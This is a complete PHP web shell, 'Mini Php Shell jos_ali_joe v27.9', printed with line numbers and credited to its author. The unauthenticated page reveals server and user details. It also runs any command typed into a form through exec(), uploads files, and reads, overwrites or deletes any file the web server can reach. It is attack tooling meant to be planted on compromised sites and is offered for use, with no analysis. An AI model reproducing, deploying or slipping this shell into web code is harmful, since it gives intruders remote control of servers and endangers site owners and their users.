Mini Php Shell jos_ali_joe v27.9

1. <html>
2.  
3. <head>
4.  
5. <title>Mini Php Shell jos_ali_joe</title>
6.  
7. <style type="text/css">
8.  
9. a {
10.  
11. text-decoration: none;
12.  
13. display: block;
14.  
15. }
16.  
17.  
18.  
19. a img {
20.  
21. border: 0;
22.  
23. }
24.  
25.  
26.  
27. #view tr:hover {
28.  
29. background-color: #FFFFFF;
30.  
31. }
32.  
33.  
34.  
35. input {
36.  
37. font-family: Courier New, Courier, Fixed;
38.  
39. font-size: 15px;
40.  
41. background-color: #FFFFFF;
42.  
43. color: #000000;
44.  
45. }
46.  
47.  
48.  
49. input:hover {
50.  
51. background-color: #000000;
52.  
53. }
54.  
55.  
56.  
57. textarea {
58.  
59. font-family: Courier New, Courier, Fixed;
60.  
61. font-size: 15px;
62.  
63. background-color: #FFFFFF;
64.  
65. color: #000000;
66.  
67. }
68.  
69.  
70.  
71. body {
72.  
73. font-family: Courier New, Courier, Fixed;
74.  
75. font-size: 10px;
76.  
77. color: #FFFFFF;
78.  
79. }
80.  
81.  
82.  
83. table#bordered {
84.  
85. border: 1px solid #FFFFFF;
86.  
87. background-color: #000;
88.  
89. font-family: Courier New, Courier, Fixed;
90.  
91. font-size: 15px;
92.  
93. color: #FFFFFF;
94.  
95. }
96.  
97.  
98.  
99. form#post {}
100.  
101.  
102.  
103. #post .buttons {
104.  
105. background-color: transparent;
106.  
107. font-family: Arial;
108.  
109. font-size: 15px;
110.  
111. color: #777;
112.  
113. border: 0;
114.  
115. }
116.  
117.  
118.  
119. #cell {
120.  
121. border-bottom: 1px #FFFFFF dotted;
122.  
123. }
124.  
125. </style>
126.  
127. </head>
128.  
129.  
130.  
131. <body bgcolor="#000000" background="http://sphotos.ak.fbcdn.net/hphotos-ak-snc4/hs1338.snc4/163084_194272833919515_100000103989299_786756_1673828_n.jpg" link="#444444" vlink="#444444">
132.  
133. <h1 style='color: #fff'><u><a href="<?php print $_SERVER['PHP_SELF']; ?>" style="color: #fff">
134.  
135. Mini Php Shell jos_ali_joe V27.9</a></u></h1>
136.  
137. <p style="color: #fff">Coded by jos_ali_joe<br><br># web: <u><a http://explorecrew.org/" style="display: inline;
138.  
139. color: #fff">http://explorecrew.org/</a></u><br> # Contact : ali@explorecrew.org </u></p><br>
140.  
141.  
142.  
143. <table border=0 id="bordered">
144.  
145.  
146.  
147. <?php
148.  
149. function getperms($f) {
150.  
151. $mode=fileperms($f);
152.  
153.  
154.  
155. $perm='';
156.  
157. $perm .= ($mode & 00400) ? 'r' : '-';
158.  
159. $perm .= ($mode & 00200) ? 'w' : '-';
160.  
161. $perm .= ($mode & 00100) ? 'x' : '-';
162.  
163. $perm .= ($mode & 00040) ? 'r' : '-';
164.  
165. $perm .= ($mode & 00020) ? 'w' : '-';
166.  
167. $perm .= ($mode & 00010) ? 'x' : '-';
168.  
169. $perm .= ($mode & 00004) ? 'r' : '-';
170.  
171. $perm .= ($mode & 00002) ? 'w' : '-';
172.  
173. $perm .= ($mode & 00001) ? 'x' : '-';
174.  
175.  
176.  
177. return $perm;
178.  
179. }
180.  
181.  
182.  
183. print "<tr><td>~ host </td><td><b>".$_SERVER['SERVER_NAME']."</b></td></tr>";
184.  
185. print "<tr><td>~ server </td><td><b>".$_SERVER['SERVER_SOFTWARE']."</b></td></tr>";
186.  
187. if (is_callable("php_uname"))
188.  
189. print "<tr><td>~ os </td><td><b>".php_uname()."</b></td></tr>";
190.  
191.  
192.  
193. if (is_callable("posix_getuid") and is_callable("posix_getgid")) {
194.  
195. $uid=posix_getuid();
196.  
197. $uname=posix_getpwuid($uid);
198.  
199. $uname=$uname['name'];
200.  
201.  
202.  
203. $gid=posix_getgid();
204.  
205. $gname=posix_getgrgid($gid);
206.  
207. $gname=$gname['name'];
208.  
209.  
210.  
211. print "<tr><td>~ uid </td><td><b>$uid ($uname)</b></td></tr>";
212.  
213. print "<tr><td>~ gid </td><td><b>$gid ($gname)</b></td></tr>";
214.  
215. }
216.  
217.  
218.  
219. print "</table><br><br>";
220.  
221.  
222.  
223. if (!isset($_POST['file'])) {
224.  
225. ?>
226.  
227.  
228.  
229. <table border=0 style="font-size: 12px">
230.  
231.  
232.  
233. <form enctype="multipart/form-data" action="<?php print $_SERVER['REQUEST_URI']; ?>" method="POST">
234.  
235. <input type="hidden" name="MAX_FILE_SIZE" value="200000000"/>
236.  
237. <input type="hidden" name="do_upload" value="true">
238.  
239. <tr><td>&gt; Upload Data</td></tr>
240.  
241. <tr><td><input type="file" name="userfile"/></td></tr>
242.  
243. <tr><td><input type="submit" value="> send"/></td></tr>
244.  
245. </form>
246.  
247.  
248.  
249. <tr><td height="20px"></td></tr>
250.  
251.  
252.  
253. <form action="<?php print $_SERVER['REQUEST_URI']; ?>" method="POST">
254.  
255. <tr><td>> Comand</td></tr>
256.  
257. <tr><td><input type="text" name="cmd"></td></tr>
258.  
259. <tr><td><input type="submit" value="> execute cmd"></td></tr>
260.  
261. </form>
262.  
263. </table>
264.  
265.  
266.  
267. <?php
268.  
269. }
270.  
271.  
272.  
273. #
274.  
275. # Upload di file
276.  
277. #
278.  
279. if ($_POST['do_upload']==="true") {
280.  
281. if ($_POST['dir']=="true")
282.  
283. $dir=$_POST['dirname'];
284.  
285. else
286.  
287. $dir=getcwd();
288.  
289.  
290.  
291. $uploadfile=$dir."/".basename($_FILES['userfile']['name']);
292.  
293.  
294.  
295. if (move_uploaded_file($_FILES['userfile']['tmp_name'],$uploadfile)) {
296.  
297. print "File successfully loaded<br>\n";
298.  
299. print "~ file name: <b>".$_FILES['userfile']['name']."</b><br>".
300.  
301. "\n~ type: ".$_FILES['userfile']['type']."<br>\n".
302.  
303. "~ size: ".$_FILES['userfile']['size']." bytes<br>\n";
304.  
305. }
306.  
307.  
308.  
309. else print "$ Error while loading ".$_FILES['userfile']['name']."<br>\n";
310.  
311. }
312.  
313.  
314.  
315. #
316.  
317. # Modifica o cancellazione di file
318.  
319. #
320.  
321. if (isset($_POST['dofile'])) {
322.  
323. $ref=$_SERVER['HTTP_REFERER'];
324.  
325. $fname=htmlentities($_POST['dofile']);
326.  
327. $content=$_POST['content'];
328.  
329.  
330.  
331. #
332.  
333. # Modifica
334.  
335. #
336.  
337. if (isset($_POST['save'])) {
338.  
339. if (!($fp=fopen($fname,"w")))
340.  
341. die ("$ Unable to write to <b>$fname</b><br>\n");
342.  
343.  
344.  
345. fputs ($fp,$content);
346.  
347. fclose($fp);
348.  
349.  
350.  
351. print ("File <b>$fname</b> successfully updated<br><br>\n");
352.  
353. }
354.  
355.  
356.  
357. #
358.  
359. # Cancellazione
360.  
361. #
362.  
363. if (isset($_POST['remove'])) {
364.  
365. unlink ($fname) or die ("$ Unable to remove <b>$fname</b><br>\n");
366.  
367. print "<b>$fname</b> successfully removed<br><br>\n";
368.  
369. }
370.  
371. }
372.  
373.  
374.  
375. #
376.  
377. # Esecuzione di un comando
378.  
379. #
380.  
381. if (isset($_POST['cmd'])) {
382.  
383. $cmd=$_POST['cmd'];
384.  
385. $output=array();
386.  
387. exec ($cmd,$output);
388.  
389.  
390.  
391. print "<br><hr height=1 width=\"100%\">\n";
392.  
393. print "# cmd output: <br><br><tt>";
394.  
395. print "<div style=\"border: 1px solid #FFFFFF; background-color: #000; padding: 10px\">\n";
396.  
397.  
398.  
399. foreach ($output as $line)
400.  
401. print "$line<br>\n";
402.  
403. print "</div></tt>\n";
404.  
405. die('');
406.  
407. }
408.  
409.  
410.  
411. #
412.  
413. # Visualizzazione di file
414.  
415. #
416.  
417. if (isset($_POST['fname'])) {
418.  
419. print "# Warning: editing or removing a file is only possible if you've got the privileges to do that<br><br>";
420.  
421.  
422.  
423. $fname=htmlentities($_POST['fname']);
424.  
425. $file=file($fname) or print "$ Unable to open <b>$fname</b><br>\n";
426.  
427.  
428.  
429. print "<form action=\"".$_SERVER['REQUEST_URI']."\" method=\"POST\">\n";
430.  
431. print "<input type=\"hidden\" name=\"dofile\" value=\"$fname\">\n";
432.  
433. print "<textarea rows=20 cols=80 name=\"content\">";
434.  
435.  
436.  
437. for ($i=0; $i<count($file); $i++)
438.  
439. print htmlentities($file[$i]);
440.  
441.  
442.  
443. print "</textarea><br><br>\n";
444.  
445. print "<input type=\"submit\" value=\"> Save file\" name=\"save\">\n";
446.  
447. print "<input type=\"submit\" value=\"> Delete file\" name=\"remove\">\n";
448.  
449. print "</form>\n";
450.  
451. }
452.  
453.  
454.  
455. #
456.  
457. # Visualizzazione del contenuto di una directory
458.  
459. #
460.  
461. if (isset($_POST['dirname']))
462.  
463. $path=htmlspecialchars($_POST['dirname']);
464.  
465. else
466.  
467. $path=getcwd();
468.  
469.  
470.  
471. $dp=opendir($path) or die("$ Unable to open <b>$path</b><br>\n");
472.  
473. chdir ($path);
474.  
475. $path=getcwd();
476.  
477.  
478.  
479. print "<div id=\"view\"><hr height=1 width=\"100%\">\n";
480.  
481. print "<font color=\"white\">&gt; cwd: <b>".getcwd()."</b></font><br><br>\n\n";
482.  
483. $dir=array();
484.  
485.  
486.  
487. while ($file=readdir($dp))
488.  
489. if (strcmp(".",$file))
490.  
491. array_push($dir,"$path/$file");
492.  
493.  
494.  
495. closedir($dp);
496.  
497. sort($dir);
498.  
499.  
500.  
501. ?>
502.  
503.  
504.  
505. <form name="post" id="post" action="<?php print $_SERVER['REQUEST_URI']; ?>" method="POST">
506.  
507. <table border=0 width="100%" style="border: 1px #FFFFFF solid; background-color: #000">
508.  
509. <?php
510.  
511. for ($i=0; $i<count($dir); $i++) {
512.  
513. print "<tr style='font-family: Arial; font-size: 11px;'>\n";
514.  
515.  
516.  
517. #
518.  
519. # Directory superiore
520.  
521. #
522.  
523. if (basename($dir[$i])==="..") {
524.  
525. $tmp=split('/',getcwd());
526.  
527. $new="";
528.  
529.  
530.  
531. for ($j=0; $j<count($tmp)-1; $j++)
532.  
533. $new .= $tmp[$j]."/";
534.  
535.  
536.  
537. print "<td width=\"40px\" id=\"cell\" style=\"font-size: 9px\">UP</td>\n";
538.  
539. print "<td id=\"cell\"><input type=\"submit\" name=\"dirname\" value=\"$new\" class=\"buttons\"></td></tr>\n";
540.  
541. }
542.  
543.  
544.  
545. #
546.  
547. # Directory
548.  
549. #
550.  
551. if (is_dir($dir[$i])) {
552.  
553. if (basename($dir[$i])!='..') {
554.  
555. print "<td width=\"40px\" id=\"cell\" style=\"font-size: 9px\">DIR</td>\n";
556.  
557. print "<td id=\"cell\"><input type=\"submit\" name=\"dirname\" value=\"".$dir[$i].
558.  
559. "\" class=\"buttons\"></td>\n";
560.  
561. print "<td id=\"cell\">DIR</td></tr>\n";
562.  
563. }
564.  
565. }
566.  
567.  
568.  
569. #
570.  
571. # File comune
572.  
573. #
574.  
575. else {
576.  
577. if (basename($dir[$i])!='..') {
578.  
579. print "<td width=\"40px\" id=\"cell\" style=\"font-size: 9px\">FILE</td>\n";
580.  
581. print "<td id=\"cell\"><input type=\"submit\" name=\"fname\" value=\"$dir[$i]\" class=\"buttons\"></td>\n";
582.  
583. print "<td id=\"cell\">".getperms($dir[$i])."</td></tr>\n";
584.  
585. }
586.  
587. }
588.  
589. }
590.  
591.  
592.  
593. print "</table></div>\n";
594.  
595. ?>
596.  
597.  
598.  
599. </body>
600.  
601. </html>